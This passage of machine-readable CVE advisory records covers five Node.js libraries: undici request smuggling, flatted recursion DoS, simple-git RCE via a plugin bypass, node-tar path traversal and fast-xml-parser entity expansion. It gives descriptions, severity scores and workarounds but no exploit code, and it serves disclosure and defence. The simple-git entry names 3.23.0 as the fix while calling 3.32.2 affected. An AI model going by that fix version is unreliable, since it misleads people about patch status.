                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-12T20:44:24.555703Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-12T20:46:13.379Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "collectionURL": "https://github.com/nodejs/undici/",
          "defaultStatus": "unaffected",
          "packageName": "undici",
          "product": "undici",
          "repo": "https://github.com/nodejs/undici/",
          "vendor": "undici",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 6.24.0; 7.0.0 \u003c 7.24.0"
            },
            {
              "status": "unaffected",
              "version": "6.24.0: 7.24.0"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "remediation developer",
          "value": "Matteo Collina"
        },
        {
          "lang": "en",
          "type": "remediation developer",
          "value": "Ulises Gasc\u00f3n"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003eUndici allows duplicate HTTP\u0026nbsp;\u003ccode\u003eContent-Length\u003c/code\u003e\u0026nbsp;headers when they are provided in an array with case-variant names (e.g.,\u0026nbsp;\u003ccode\u003eContent-Length\u003c/code\u003e\u0026nbsp;and\u0026nbsp;\u003ccode\u003econtent-length\u003c/code\u003e). This produces malformed HTTP/1.1 requests with multiple conflicting\u0026nbsp;\u003ccode\u003eContent-Length\u003c/code\u003e\u0026nbsp;values on the wire.\u003c/p\u003e\u003cp\u003e\u003cstrong\u003eWho is impacted:\u003c/strong\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003eApplications using\u0026nbsp;\u003ccode\u003eundici.request()\u003c/code\u003e,\u0026nbsp;\u003ccode\u003eundici.Client\u003c/code\u003e, or similar low-level APIs with headers passed as flat arrays\u003c/li\u003e\u003cli\u003eApplications that accept user-controlled header names without case-normalization\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cstrong\u003ePotential consequences:\u003c/strong\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cstrong\u003eDenial of Service\u003c/strong\u003e: Strict HTTP parsers (proxies, servers) will reject requests with duplicate\u0026nbsp;\u003ccode\u003eContent-Length\u003c/code\u003e\u0026nbsp;headers (400 Bad Request)\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eHTTP Request Smuggling\u003c/strong\u003e: In deployments where an intermediary and backend interpret duplicate headers inconsistently (e.g., one uses the first value, the other uses the last), this can enable request smuggling attacks leading to ACL bypass, cache poisoning, or credential hijacking\u003c/li\u003e\u003c/ul\u003e"
            }
          ],
          "value": "Undici allows duplicate HTTP\u00a0Content-Length\u00a0headers when they are provided in an array with case-variant names (e.g.,\u00a0Content-Length\u00a0and\u00a0content-length). This produces malformed HTTP/1.1 requests with multiple conflicting\u00a0Content-Length\u00a0values on the wire.\n\nWho is impacted:\n\n  *  Applications using\u00a0undici.request(),\u00a0undici.Client, or similar low-level APIs with headers passed as flat arrays\n  *  Applications that accept user-controlled header names without case-normalization\n\n\nPotential consequences:\n\n  *  Denial of Service: Strict HTTP parsers (proxies, servers) will reject requests with duplicate\u00a0Content-Length\u00a0headers (400 Bad Request)\n  *  HTTP Request Smuggling: In deployments where an intermediary and backend interpret duplicate headers inconsistently (e.g., one uses the first value, the other uses the last), this can enable request smuggling attacks leading to ACL bypass, cache poisoning, or credential hijacking"
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-33",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-33 HTTP Request Smuggling"
            }
          ]
        },
        {
          "capecId": "CAPEC-273",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-273 HTTP Response Smuggling"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-444",
              "description": "CWE-444 Inconsistent interpretation of HTTP requests (\u0027HTTP Request/Response smuggling\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-12T19:56:55.092Z",
        "orgId": "ce714d77-add3-4f53-aff5-83d477b104bb",
        "shortName": "openjs"
      },
      "references": [
        {
          "url": "https://github.com/nodejs/undici/security/advisories/GHSA-2mjp-6q6p-2qxm"
        },
        {
          "url": "https://www.rfc-editor.org/rfc/rfc9110.html#section-8.6"
        },
        {
          "url": "https://cwe.mitre.org/data/definitions/444.html"
        },
        {
          "url": "https://hackerone.com/reports/3556037"
        },
        {
          "url": "https://cna.openjsf.org/security-advisories.html"
        }
      ],
      "source": {
        "advisory": "GHSA-2mjp-6q6p-2qxm",
        "discovery": "INTERNAL"
      },
      "title": "undici is vulnerable to Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)",
      "workarounds": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cp\u003eIf upgrading is not immediately possible:\u003c/p\u003e\u003col\u003e\u003cli\u003e\u003cstrong\u003eValidate header names\u003c/strong\u003e: Ensure no duplicate\u0026nbsp;\u003ccode\u003eContent-Length\u003c/code\u003e\u0026nbsp;headers (case-insensitive) are present before passing headers to undici\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eUse object format\u003c/strong\u003e: Pass headers as a plain object (\u003ccode\u003e{ \u0027content-length\u0027: \u0027123\u0027 }\u003c/code\u003e) rather than an array, which naturally deduplicates by key\u003c/li\u003e\u003cli\u003e\u003cstrong\u003eSanitize user input\u003c/strong\u003e: If headers originate from user input, normalize header names to lowercase and reject duplicates\u003c/li\u003e\u003c/ol\u003e"
            }
          ],
          "value": "If upgrading is not immediately possible:\n\n  *  Validate header names: Ensure no duplicate\u00a0Content-Length\u00a0headers (case-insensitive) are present before passing headers to undici\n  *  Use object format: Pass headers as a plain object ({ \u0027content-length\u0027: \u0027123\u0027 }) rather than an array, which naturally deduplicates by key\n  *  Sanitize user input: If headers originate from user input, normalize header names to lowercase and reject duplicates"
        }
      ],
      "x_generator": {
        "engine": "Vulnogram 1.0.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "ce714d77-add3-4f53-aff5-83d477b104bb",
    "assignerShortName": "openjs",
    "cveId": "CVE-2026-1525",
    "datePublished": "2026-03-12T19:56:55.092Z",
    "dateReserved": "2026-01-28T12:04:51.369Z",
    "dateUpdated": "2026-03-12T20:46:13.379Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-32141",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-13T16:20:15.479714Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-13T16:20:19.201Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/WebReflection/flatted/security/advisories/GHSA-25h7-pfq9-p65f"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "flatted",
          "vendor": "WebReflection",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 3.4.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "flatted is a circular JSON parser. Prior to 3.4.0, flatted\u0027s parse() function uses a recursive revive() phase to resolve circular references in deserialized JSON. When given a crafted payload with deeply nested or self-referential $ indices, the recursion depth is unbounded, causing a stack overflow that crashes the Node.js process. This vulnerability is fixed in 3.4.0."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-674",
              "description": "CWE-674: Uncontrolled Recursion",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-12T18:08:09.634Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/WebReflection/flatted/security/advisories/GHSA-25h7-pfq9-p65f",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/WebReflection/flatted/security/advisories/GHSA-25h7-pfq9-p65f"
        },
        {
          "name": "https://github.com/WebReflection/flatted/pull/88",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/WebReflection/flatted/pull/88"
        },
        {
          "name": "https://github.com/WebReflection/flatted/commit/7eb65d857e1a40de11c47461cdbc8541449f0606",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/WebReflection/flatted/commit/7eb65d857e1a40de11c47461cdbc8541449f0606"
        }
      ],
      "source": {
        "advisory": "GHSA-25h7-pfq9-p65f",
        "discovery": "UNKNOWN"
      },
      "title": "flatted: Unbounded recursion DoS in parse() revive phase"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-32141",
    "datePublished": "2026-03-12T18:08:09.634Z",
    "dateReserved": "2026-03-10T22:19:36.546Z",
    "dateUpdated": "2026-03-13T16:20:19.201Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-28292",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-11T14:16:22.024619Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-11T14:16:31.399Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "simple-git",
          "vendor": "steveukx",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 3.15.0, \u003c 3.32.3"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "`simple-git`, an interface for running git commands in any node.js application, has an issue in versions 3.15.0 through 3.32.2 that allows an attacker to bypass two prior CVE fixes (CVE-2022-25860 and CVE-2022-25912) and achieve full remote code execution on the host machine. Version 3.23.0 contains an updated fix for the vulnerability."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-78",
              "description": "CWE-78: Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-178",
              "description": "CWE-178: Improper Handling of Case Sensitivity",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-10T18:34:21.717Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://www.codeant.ai/security-research/security-research-simple-git-remote-code-execution-cve-2026-28292",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://www.codeant.ai/security-research/security-research-simple-git-remote-code-execution-cve-2026-28292"
        },
        {
          "name": "https://github.com/steveukx/git-js/commit/f7042088aa2dac59e3c49a84d7a2f4b26048a257",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/steveukx/git-js/commit/f7042088aa2dac59e3c49a84d7a2f4b26048a257"
        }
      ],
      "source": {
        "advisory": "GHSA-r275-fr43-pm7q",
        "discovery": "UNKNOWN"
      },
      "title": "simple-git has blockUnsafeOperationsPlugin bypass via case-insensitive protocol.allow config key enables RCE"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-28292",
    "datePublished": "2026-03-10T18:34:21.717Z",
    "dateReserved": "2026-02-26T01:52:58.736Z",
    "dateUpdated": "2026-03-11T14:16:31.399Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-23745",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-01-20T14:52:52.988465Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-01-20T14:53:24.513Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "node-tar",
          "vendor": "isaacs",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 7.5.3"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "node-tar is a Tar for Node.js. The node-tar library (\u003c= 7.5.2) fails to sanitize the linkpath of Link (hardlink) and SymbolicLink entries when preservePaths is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to Arbitrary File Overwrite via hardlinks and Symlink Poisoning via absolute symlink targets. This vulnerability is fixed in 7.5.3."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "LOCAL",
            "baseScore": 8.2,
            "baseSeverity": "HIGH",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "HIGH",
            "subIntegrityImpact": "LOW",
            "userInteraction": "ACTIVE",
            "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:L/VA:N/SC:H/SI:L/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "LOW"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-16T22:00:08.769Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97"
        },
        {
          "name": "https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e"
        }
      ],
      "source": {
        "advisory": "GHSA-8qq5-rm4j-mr97",
        "discovery": "UNKNOWN"
      },
      "title": "node-tar Vulnerable to Arbitrary File Overwrite and Symlink Poisoning via Insufficient Path Sanitization"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-23745",
    "datePublished": "2026-01-16T22:00:08.769Z",
    "dateReserved": "2026-01-15T15:45:01.958Z",
    "dateUpdated": "2026-01-20T14:53:24.513Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-26278",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-02-19T20:58:40.378859Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-02-19T21:21:49.452Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "fast-xml-parser",
          "vendor": "NaturalIntelligence",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 5.0.0, \u003c 5.3.6"
            },
            {
              "status": "affected",
              "version": "\u003e= 4.1.3, \u003c 4.5.4"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "fast-xml-parser allows users to validate XML, parse XML to JS object, or build XML from JS object without C/C++ based libraries and no callback. In versions 4.1.3 through 5.3.5, the XML parser can be forced to do an unlimited amount of entity expansion. With a very small XML input, it\u2019s possible to make the parser spend seconds or even minutes processing a single request, effectively freezing the application. Version 5.3.6 fixes the issue. As a workaround, avoid using DOCTYPE parsing by `processEntities: false` option."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-776",
              "description": "CWE-776: Improper Restriction of Recursive Entity References in DTDs (\u0027XML Entity Expansion\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-02T19:11:59.388Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-jmr7-xgp7-cmfj",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-jmr7-xgp7-cmfj"
        },
        {
          "name": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/910dae5be2de2955e968558fadf6e8f74f117a77",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/910dae5be2de2955e968558fadf6e8f74f117a77"
        },
        {
          "name": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.6",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.6"
        }
      ],
      "source": {
        "advisory": "GHSA-jmr7-xgp7-cmfj",
        "discovery": "UNKNOWN"
      },
      "title": "fast-xml-parser affected by DoS through entity expansion in DOCTYPE (no expansion limit)"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-26278",
    "datePublished": "2026-02-19T19:40:55.842Z",
    "dateReserved": "2026-02-12T17:10:53.414Z",
    "dateUpdated": "2026-03-02T19:11:59.388Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}